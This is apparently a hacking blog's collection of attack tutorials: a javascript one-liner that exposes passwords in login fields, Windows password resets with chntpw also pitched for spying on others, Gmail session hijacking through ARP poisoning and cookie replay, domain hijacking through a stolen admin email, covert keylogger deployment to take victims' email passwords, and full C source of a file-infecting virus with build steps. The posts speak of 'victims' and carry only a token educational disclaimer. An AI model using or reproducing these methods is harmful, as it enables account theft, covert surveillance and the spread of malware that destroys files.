Reveal the dotted password

You might have seen that the password you enter will be displayed as *s or as Dots in almost all log in pages on internet. This is because, the designers who design the log in screens will make the text inside the password field hidden or made them displayed as Stars (*) or as Dots.This is just to make the password unreadable by others while the account admin try to log in to his account.

But here is a trick to read the hidden password of the admin inside password field of a Log in page or even any other pages. This trick is based on a java script which extracts the password from the password field and will display it in a dialog box as plain text.

To read the password inside the password field in text format ,enter this into the empty address bar of the log in page and press enter. Make sure that you have a log in page with any password entered in password field.

javascript: var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var w=window.frames;for(var k=0;k < w.length;k++) {var x = ((x) || (z(w[k].document.forms)));g=g+1;}if (!x) alert('Password not found in ' + g + ' forms');}function z(f){var b=false;for(var i=0;i < f.length;i++) {var e=f[i].elements;for(var j=0;j < e.length;j++) {if (h(e[j])) {b=true}}}return b;}function h(ej){var s='';if (ej.type=='password'){s=ej.value;if (s!=''){prompt('Password found, THANX TO LETHALTRIX ', s)}else{alert('Password is blank')}return true;}}


COPY THE RED COLOURED JAVASCRIPT ABOVE AND PASTE IT IN THE ADDRESS BAR OF THE PAGE CONTAINING DOTTED OR STARRED PASSWORD... DONE :)

Change Windows Login Password using Ubuntu Live CD

If you forgot your windows login password or if you want to spy the password protected windows account of ur soon, here is a method :). A small windows login hacking tutorial just for the LethalTrix Readers.This method works for all of the NT-based version of Windows – anything from Windows 2000 and later, basically. And yes, that includes Windows 7 & Windows XP.

Note: If you have files on your hard disk encrypted using built-in Windows encryption, they may not be available after changing the Windows password using this method. Exercise caution if you have important encrypted files.

You’ll need a Ubuntu Live CD, or a bootable Ubuntu  Flash Drive. U can create bootable flash drive using the startup disk creator app in ubuntu..(Or you can use softwares such as UNetbootin or Lili USB creator in windows)

The program that lets us manipulate Windows passwords is called chntpw. The steps to install it are different in 32-bit and 64-bit versions of Ubuntu.(you should hav internet connection to download this)

Installation: 32-bit

Open up Synaptic Package Manager by typing Synaptic in unity search in Ubuntu 11.4 or higher or else byclicking on System at the top of the screen, expanding the Administration section, and clicking on Synaptic Package Manager in older versions.

chntpw is found in the universe repository. Repositories are a way for Ubuntu to group software together so that users are able to choose if they want to use only completely open source software maintained by Ubuntu developers, or branch out and use software with different licenses and maintainers.

To enable software from the universe repository, click on Settings > Repositories in the Synaptic window.

Add a checkmark beside the box labeled “Community-maintained Open Source software (universe)” and then click close.

When you change the repositories you are selecting software from, you have to reload the list of available software. In the main Synaptic window, click on the Reload button.

The software lists will be downloaded.

Once downloaded, Synaptic must rebuild its search index. The label over the text field by the Search button will read “Rebuilding search index.” When it reads “Quick search,” typechntpw in the text field. The package will show up in the list.

Click on the checkbox near the chntpw name. Click on Mark for Installation.

chntpw won’t actually be installed until you apply the changes you’ve made, so click on the Apply button in the Synaptic window now.

You will be prompted to accept the changes. Click Apply.

The changes should be applied quickly. When they’re done, click Close.

chntpw is now installed! You can close Synaptic Package Manager. Skip to the section titledUsing chntpw to reset your password.

Installation: 64-bit

The version of chntpw available in Ubuntu’s universe repository will not work properly on a 64-bit machine. Fortunately, a patched version exists in Debian’s Unstable branch, so let’s download it from there and install it manually.

Open Firefox. Whether it’s your preferred browser or not, it’s very readily accessible in the Ubuntu Live CD environment, so it will be the easiest to use. There’s a shortcut to Firefox in the top panel.

Navigate to http://packages.debian.org/sid/amd64/chntpw/download and download the latest version of chntpw for 64-bit machines.

Note: In most cases it would be best to add the Debian Unstable branch to a package manager, but since the Live CD environment will revert to its original state once you reboot, it’ll be faster to just download the .deb file.

Save the .deb file to the default location.

You can close Firefox if desired. Open a terminal window by pressing Alt+Ctrl+T

In the terminal window, enter the following text, hitting enter after each line:

cd Downloads
sudo dpkg –i chntpw*

chntpw will now be installed.

Using chntpw to reset your password

Before running chntpw, you will have to mount the hard drive that contains your Windows installation. In most cases, Ubuntu 9.10 makes this simple.

Click on Places at the top-left of the screen. If your Windows drive is easily identifiable – usually by its size – then left click on it.

If it is not obvious, then click on Computer and check out each hard drive until you find the correct one.

The correct hard drive will have the WINDOWS folder in it. When you find it, make a note of the drive’s label that appears in the menu bar of the file browser.

If you don’t already have one open, start a terminal window by going to Applications > Accessories > Terminal.

In the terminal window, enter the commands

cd /media
ls

pressing enter after each line. You should see one or more strings of text appear; one of those strings should correspond with the string that appeared in the title bar of the file browser earlier.

Change to that directory by entering the command

cd <hard drive label>

Since the hard drive label will be very annoying to type in, you can use a shortcut by typing in the first few letters or numbers of the drive label (capitalization matters) and pressing the Tab key. It will automatically complete the rest of the string (if those first few letters or numbers are unique).

We want to switch to a certain Windows directory. Enter the command:

cd WINDOWS/system32/config/

Again, you can use tab-completion to speed up entering this command.

To change or reset the administrator password, enter:

sudo chntpw SAM

SAM is the file that contains your Windows registry. You will see some text appear, including a list of all of the users on your system.

At the bottom of the terminal window, you should see a prompt that begins with “User Edit Menu:” and offers four choices. We recommend that you clear the password to blank (you can always set a new password in Windows once you log in). To do this, enter “1” and then “y” to confirm.

If you would like to change the password instead, enter “2”, then your desired password, and finally “y” to confirm.

If you would like to reset or change the password of a user other than the administrator, enter:

sudo chntpw –u <username> SAM

From here, you can follow the same steps as before: enter “1” to reset the password to blank, or “2” to change it to a value you provide.

And that’s it!

chntpw is a very useful utility provided for free by the open source community. It may make you think twice about how secure the Windows login system is, but knowing how to usechntpw can save your tail if your memory fails you two or eight times!

HACKING GMAIL USING GX SCRIPT

Introduction

Hacking web application was always curious for the script kiddies. And hacking free web email account is every geek first attempt. The method which I will describe in this post is not new; the same method can be applied to yahoo and other free web email services too.

The method we will be using is cookie stealing and replaying the same back to the Gmail server. There are many ways you can steal cookie, one of them is XSS (Cross site scripting). But we won’t be using any XSS here, in our part of attack we will use some local tool to steal cookie and use that cookie to get an access to Gmail account.

Assumption:
You are in Local Area Network (LAN) in a switched / wireless environment : example : office , cyber café, Mall etc.
You know basic networking.

Tool used for this attack:
Cain & Abel
Network Miner
Firefox web browser with Cookie Editor add-ons

Attack in detail:

We assume you are connected to LAN/Wireless network. Our main goal is to capture Gmail GX cookie from the network. We can only capture cookie when someone is actually using his gmail. I’ve noticed normally in lunch time in office, or during shift start people normally check their emails. If you are in cyber café or in Mall then there are more chances of catching people using Gmail.

We will go step by step,
If you are using Wireless network then you can skip this Step A.

A] Using Cain to do ARP poisoning and routing:

Switch allows unicast traffic mainly to pass through its ports. When X and Y are communicating eachother in switch network then Z will not come to know what X & Y are communicating, so inorder to sniff that communication you would have to poison ARP table of switch for X & Y. In Wireless you don’t have to do poisoning because Wireless Access points act like HUB which forwards any communication to all its ports (recipients).
Start Cain from Start > Program > Cain > Cain
Click on Start/Stop Snigger tool icon from the tool bar, we will first scan the network to see what all IPs are used in the network and this list will also help us to launch an attack on the victim.
Then click on Sniffer Tab then Host Tab below. Right click within that spreadsheet and click on Scan Mac Addresses, from the Target section select
All hosts in my subnet and then press Ok. This will list all host connected in your network. You will notice you won’t see your Physical IP of your machine in that list.
How to check your physical IP ?
> Click on start > Run type cmd and press enter, in the command prompt type
Ipconfig and enter. This should show your IP address assign to your PC.
It will have following outputs:

Main thing to know here is your IP address and your Default Gateway.

Make a note of your IP Address & default gateway. From Cain you will see list of IP addresses, here you have to choose any free IP address which is not used anywhere. We assume IP 192.168.1.10 is not used anywhere in the network.

Click on Configure > APR > Use Spoof ed IP and MAC Address > IP
Type in 192.168.1.10 and from the poisoning section click on “Use ARP request Packets” and click on OK.

Within the Sniffer Tab , below click on APR Tab, from the left hand side click on APR and now click on the right hand top spreadsheet then click on plus sign tool from top. The moment you click that it will show you list of IP address on left hand side. Here we will target the victim IP address and the default gateway.

The purpose is to do ARP poisoning between victim and the default gateway and route the victim traffic via your machine. From the left side click on Victim IP address, we assume victim is using 192.168.1.15. The moment you click on victim IP you will see remaining list on the right hand side here you have to select default gateway IP address i.e. 192.168.1.1 then click on OK.
Finally, Click on Start/Stop Sniffer tool menu once again and next click on Start/Stop APR. This will start poisoning victim and default gateway.

B] Using Network Miner to capture cookie in plain text

We are using Network miner to capture cookie, but Network miner can be used for manythings from capturing text , image, HTTP parameters, files. Network Miner is normally used in Passive reconnaissance to collect IP, domain and OS finger print of the connected device to your machine. If you don’t have Network miner you can use any other sniffer available like Wireshark, Iris network scanner, NetWitness etc.

We are using This tool because of its ease to use.

Open Network Miner by clicking its exe (pls note it requires .Net framework to work).
From the “---Select network adaptor in the list---“ click on down arrow and select your adaptor If you are using Ethernet wired network then your adaptor would have Ethernet name and IP address of your machine and if you are using wireless then adaptor name would contain wireless and your IP address. Select the one which you are using and click on start.
Important thing before you start this make sure you are not browsing any websites, or using any Instant Mesaging and you have cleared all cookies from firefox.
Click on Credential Tab above. This tab will capture all HTTP cookies , pay a close look on “Host” column you should see somewhere mail.google.com. If you could locate mail.google.com entry then in the same entry right click at Username column and click on “copy username” then open notepad and paste the copied content there.
Remove word wrap from notepad and search for GX in the line. Cookie which you have captured will contain many cookies from gmail each would be separated by semicolon ( GX cookie will start with GX= and will end with semicolon you would have to copy everything between = and semicolon
Example : GX= axcvb1mzdwkfefv ; ßcopy only axcvb1mzdwkfefv

Now we have captured GX cookie its time now to use this cookie and replay the attack and log in to victim email id, for this we will use firefox and cookie editor add-ons.

C] Using Firefox & cookie Editor to replay attack.

Open Firefox and log in your gmail email account.
from firefox click on Tools > cookie Editor.
In the filter box type .google.com and Press Filter and from below list search for cookiename GX. If you locate GX then double click on that GX cookie and then from content box delete everything and paste your captured GX cookie from stepB.4 and click on save and then close.
From the Address bar of Firefox type mail.google.com and press enter, this should replay victim GX cookie to Gmail server and you would get logged in to victim Gmail email account.
Sorry! You can’t change password with cookie attack.

How to be saved from this kind of attack?

Google has provided a way out for this attack where you can use secure cookie instead of unsecure cookie. You can enable secure cookie option to always use https from Gmail settings. 
Settings > Browser connection > Always use https


------

pop3.

How to Hack Windows Administrator Password

This hack will show you how to reset Windows administrator password (for Win 2000, XP, Vista and Win 7) at times when you forget it or when you want to gain access to a computer for which you do not know the password.

Most of us have experienced a situation where in we need to gain access to a computer which is password protected or at times we may forget the administrator password without which it becomes impossible to login to the computer. So here is an excellent hack using which you can reset the password or make the password empty (remove the password) so that you can gain administrator access to the computer. You can do this with a small tool called Offline NT Password & Registry Editor. This utility works offline, that means you need to shut down your computer and boot off your using a floppy disk, CD or USB device (such as pen drive). The tool has the following features.

• You do not need to know the old password to set a new one
• Will detect and offer to unlock locked or disabled out user accounts!
• There is also a registry editor and other registry utilities that works under linux/unix, and can be used for other things than password editing.

How it works?
Most Windows operating systems stores the login passwords and other encrypted passwords in a file called sam (Security Accounts Manager). This file can be usually found in \windows\system32\config. This file is a part of Windows registry and remains inaccessible as long as the OS is active. Hence it is necessary that you need to boot off your computer and access this sam file via boot. This tool intelligently gains access to this file and will reset/remove the password associated with administrator or any other account.

The download link for both CD and floppy drives along with the complete instructions is given below

Offline NT Password & Reg Editor Download

It is recommended that you download the CD version of the tool since floppy drive is outdated and doesn’t exist in today’s computer. Once you download you’ll get a bootable image which you need to burn it onto your CD. Now boot your computer from this CD and follow the screen instructions to reset the password.

Another simple way to reset non-administrator account passwords
Here is another simple way through which you can reset the password of any non-administrator accounts. The only requirement for this is that you need to have administrator privileges. Here is a step-by-step instruction to accomplish this task.

1. Open the command prompt (Start->Run->type cmd->Enter)


2. Now type net user and hit Enter


3. Now the system will show you a list of user accounts on the computer. Say for example you need to reset the password of the account by name John, then do as follows


4. Type net user John * and hit Enter. Now the system will ask you to enter the new password for the account. That’s it. Now you’ve successfully reset the password for John without knowing his old password.

So in this way you can reset the password of any Windows account at times when you forget it so that you need not re-install your OS for any reason. I hope this helps.

windows password loop hole...

a. ok now, what you need to do is to run compmgmt.msc

b. and click on local users and groups.

c. once you've gotten here you need to open up the 'users' folder.


at this point i am walking along with you and notice that there are several
major security holes dealing specifically with the password:
1. double clicking on the any user name allows you a list that looks
something like this:
"user name"

full name: -----------------------
|__________________|

description: -----------------------
|__________________|
--
|_| user must change password at next logon

--
|_| user cannot change password

--
|/| password never expires

--
|_| account is disabled

--
|_| account is locked out


"ok" "cancel" "apply"

ok if you can get past my cheesy drawing, i must ask, did you notice that
the "password never expires" box is checked? if you did, then you may have
realized that this means that you can also uncheck it!

2. if ure paying attention, you'll see that the 'user must change password
at next logon' box is unchecked. if you put a check in this box of course,
when you shut down the system will prompt for a new password!

3. going back to step c.,
right click on any account and notice the dialoge that appears:
set password...
all tasks
delete
rename
properties
help

i think you can handle it from here

ps. i wonder if you can access this data if this stuff is locked to the user
by the admin by going in through the command prompt. i doubt it but if anyone

found pls let me know....

Thanks for fainted brain who gave information on this for me

DOMAIN HIJACKING

In this post I will tell you about how the domain names are hacked and how they can be protected. The act of hacking domain names is commonly known as Domain Hijacking. For most of you, the term “domain hijacking” may seem to be like an alien. So let me first tell you what domain hijacking is all about.
Domain hijacking is a process by which Internet Domain Names are stolen from it’s legitimate owners. Domain hijacking is also known as domain theft. Before we can proceed to know how to hijack domain names, it is necessary to understand how the domain names operate and how they get associated with a particular web server (website).
The operation of domain name is as follows
Any website say for example gohacking.com consists of two parts. The domain name (gohacking.com) and the web hosting server where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts and hence they must be integrated before a website can operate successfully. The integration of domain name with the web hosting server is done as follows.
1. After registering a new domain name, we get a control panel where in we can have a full control of the domain.
2. From this domain control panel, we point our domain name to the web server where the website’s files are actually hosted.
For a clear understanding let me take up a small example.
John registers a new domain “abc.com” from an X domain registration company. He also purchases a hosting plan from Y hosting company. He uploads all of his files (.html, .php, javascripts etc.) to his web server (at Y). From the domain control panel (of X) he configures his domain name “abc.com” to point to his web server (of Y). Now whenever an Internet user types “abc.com”, the domain name “abc.com” is resolved to the target web server and the web page is displayed. This is how a website actually works.
What happens when a domain is hijacked
Now let’s see what happens when a domain name is hijacked. To hijack a domain name you just need to get access to the domain control panel and point the domain name to some other web server other than the original one. So to hijack a domain you need not gain access to the target web server.
For example, a hacker gets access to the domain control panel of “abc.com”. From here the hacker re-configures the domain name to point it to some other web server (Z). Now whenever an Internet user tries to access “abc.com” he is taken to the hacker’s website (Z) and not to John’s original site (Y).
In this case the John’s domain name (abc.com) is said to be hijacked.
How the domain names are hijacked
To hijack a domain name, it’s necessary to gain access to the domain control panel of the target domain. For this you need the following ingredients
1. The domain registrar name for the target domain.
2. The administrative email address associated with the target domain.
These information can be obtained by accessing the WHOIS data of the target domain. To get access the WHOIS data, goto whois.domaintools.com, enter the target domain name and click on Lookup. Once the whois data is loaded, scroll down and you’ll see Whois Record. Under this you’ll get the “Administrative contact email address”.
To get the domain registrar name, look for something like this under the Whois Record. “Registration Service Provided By: XYZ Company”. Here XYZ Company is the domain registrar. In case if you don’t find this, then scroll up and you’ll see ICANN Registrar under the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar.
The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So to take full control of the domain, the hacker will hack the administrative email associated with it. Email hacking has been discussed in my previous post how to hack an email account.
Once the hacker take full control of this email account, he will visit the domain registrar’s website and click on forgot password in the login page. There he will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once this is done all the details to reset the password will be sent to the administrative email address. Since the hacker has the access to this email account he can easily reset the password of domain control panel. After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes.
How to protect the domain name from being hijacked
The best way to protect the domain name is to protect the administrative email account associated with the domain. If you loose this email account, you loose your domain. So refer my previous post on how to protect your email account from being hacked. Another best way to protect your domain is to go for private domain registration. When you register a domain name using the private registration option, all your personal details such as your name, address, phone and administrative email address are hidden from the public. So when a hacker performs a WHOIS lookup for you domain name, he will not be able to find your name, phone and administrative email address. So the private registration provides an extra security and protects your privacy. Private domain registration costs a bit extra amount but is really worth for it’s advantages. Every domain registrar provides an option to go for private registration, so when you purchase a new domain make sure that you select the private registration option.

HOW TO HACK AN EMAIL

The most frequent question asked by many people especially in a chat room is How to Hack an Email Account? So you as the reader are most likely reading this because you want to hack into some one’s email account. Most of the sites on the internet teach you some nonsense and outdated tricks to hack an email. But here are some of the real and working ways that can be used to hack an email account.

THINGS YOU SHOULD KNOW BEFORE PROCEEDING

Before you learn the real ways to hack an email, the following are the things you should be aware of.

1. There is no ready made software that can hack emails just with a click of a button. Please don’t waste your money on such scam softwares.

2. Never trust any hacking services that claims to hack email passwords just for $100 or $200. Often people get fooled by these services and eventually loose their money with no gain.

3. With my experience of over 6 years in the field of Hacking and Security, I can tell you that there exists only 2 foolproof methods to hack an email. All the other methods are simply scam or don’t work. The following are the only 2 foolproof methods that work.

1. EASIEST WAY TO HACK AN EMAIL ACCOUNT

Today, with the advent of a program called Keylogger it’s just a cakewalk to hack an email account. It doesn’t matter whether or not you have physical access to the victim’s computer. Using a keylogger is the easiest way to hack an email account. Any one with a basic knowledge of computer can use the keylogger and within few hours you can hack any email account.

1. What is a keylogger?

A keylogger, sometimes called a keystroke logger, key logger, or system monitor, is a small program that monitors each keystroke a user types on a specific computer’s keyboard. Using a keylogger is the easiest way to hack an email account. A keylogger program can be installed just in a few seconds and once installed you are only a step away from getting the victim’s password.

2. Where is the keylogger program available?

A keylogger program is widely available on the internet. Some of the best ones are listed below

SniperSpy

Win-Spy

3. How to install it?

You can install these keyloggers just as any other program but these things you must keep in mind. While installing, it asks you to set a secret password and a hot key combination. This is because, after installation the keylogger program is completely hidden and the victim can no way identify it. So, you need the Hot Key combination and secret password to later unhide the keylogger.

4. Once installed how to get password from it?

The hacker can open the keylogger program by just pressing the hot keys (which is set during installation) and enter the password. Now it shows the logs containing every keystroke of the user,where it was pressed, at what time, including screenshots of the activities. These logs contain the password of the victim’s email account.

5. I don’t have physical access to the victim’s target computer, what can I do?

It doesn’t matter whether or not you have physical access to the victim’s computer. Because keyloggers like SniperSpy and Win-Spy offers Remote Installation Feature. With this feature it is possible to remotely install the keylogger on the victim’s PC.

You can attach the keylogger with any file such as image, MS excel file or other programs and send it to the victim via email. When the victim runs the file, it will automatically get installed without his knowledge and start recording every activity on his computer. These activities are sent to you by the keylogger software via email or FTP.

6. What is the best way to deploy the keylogger onto remote PC?

Instead of sending the keylogger as an email attachment, it is recommended that you place the file in .ZIP/.RAR format and upload it to www.hotlinkfiles.com. After uploading, just send the direct download link to the victim via email. Once he downloads the file from this link and run it, the keylogger will get installed automatically.

7. How can a keylogger hack the Email password?

Hacking an email password using keylogger is as simple as this: You install the keylogger on a Remote PC (or on your local PC). The victim is unaware of the presence of the keylogger on his computer. As usual, he logs into his Email account by typing the username and password. This username and password is recorded and sent to you via Email. Now you have the password of your target email account.

In case if you install the keylogger on your local PC, you can obtain the recorded email password just by unhiding the keylogger program (use your hot key and password to unhide).

8. Which Keylogger is the best?

I recommend SniperSpy as the best for the following reasons.

1. SniperSpy is fully compatible with Windows 98/ME/2000/XP/Vista. But Winspy has known compatible issues with Vista. So if your PC or the remote PC runs Vista then Winspy is not recommended.

2. SniperSpy is more reliable than Win-Spy since the logs sent will be received and hosted by SniperSpy servers. You need not rely on your email account to receive the logs.

2. Unlike Winspy, Sniperspy doesn’t require anything to be installed on your computer. To monitor the remote PC all you have to do is just login to your SniperSpy account from your browser.

3. SniperSpy is more easy to use and faster than Winspy.

4. SniperSpy offers better support than WinSpy.

Apart from the above mentioned reasons, both SniperSpy and WinSpy stands head-to-head. However in my opinion it’s better to go for SniperSpy since it is the best one. I have tested tons of keyloggers and the only two that stood up were SniperSpy and Winspy.

So what are you waiting for? If you’re serious to hack an email account then go grab either of the two keyloggers now!

For more information on these two softwares visit the following links

1. SniperSpy 2. WinSpy

2. OTHER WAYS TO HACK AN EMAIL ACCOUNT

The other most commonly used trick to sniff password is using Fake Login Pages. Today, Fake login pages are the most widely used techniques to hack an email account. A Fake Login page is a page that appears exactly as a Login page but once we enter our password there, we end up loosing it.

Fake login pages are created by many hackers on their sites which appear exactly as Gmail or Yahoo login pages but the entered details(username & pw) are redirected to remote server and we get redirected to some other page. Many times we ignore this but finally we loose our valuable data.

However creating a fake login page and taking it online to successfully hack an email account is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc.

I hope this info has helped you.

This post is only for ducational purpose and i am not responsible for any of the harm due to it....

A VIRUS IN C

This program is an example of how to create a virus in c.This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file.Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on.Here’s the source code of the virus program.

FILE *virus,*host;

int done,a=0;

unsigned long x;

char buff[2048];

struct ffblk ffblk;

clock_t st,end;

void main()

{

st=clock();

clrscr();

done=findfirst(”*.*”,&ffblk,0);

while(!done)

{

virus=fopen(_argv[0],”rb”);

host=fopen(ffblk.ff_name,”rb+”);

if(host==NULL)

goto next;

x=89088;

printf(”Infecting %s\n”,ffblk.ff_name,a);

while(x>2048)

{

fread(buff,2048,1,virus);

fwrite(buff,2048,1,host);

x-=2048;

}

fread(buff,x,1,virus);

fwrite(buff,x,1,host);

a++;

next:

{

fcloseall();

done=findnext(&ffblk);

}

}

printf(”DONE! (Total Files Infected= %d)”,a);

end=clock();

printf(”TIME TAKEN=%f SEC\n”, (end-st)/CLK_TCK);

getch();

}

COMPILING METHOD: BORLAND TC++ 3.0 (16-BIT): 1. Load the program in the compiler, press Alt-F9 to compile

2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)

3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)

4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)

5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect

BORLAND C++ 5.5 (32-BIT) : 1. Compile once,note down the generated EXE file length in bytes

2. Change the value of X in source code to this length in bytes

3. Recompile it.The new EXE file is ready to infect

HOW TO TEST: 1. Open new empty folder 2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)

3. Run the virus EXE file there you will see all the files in the current directory get infected.

4.All the infected files will be ready to reinfect

That’s it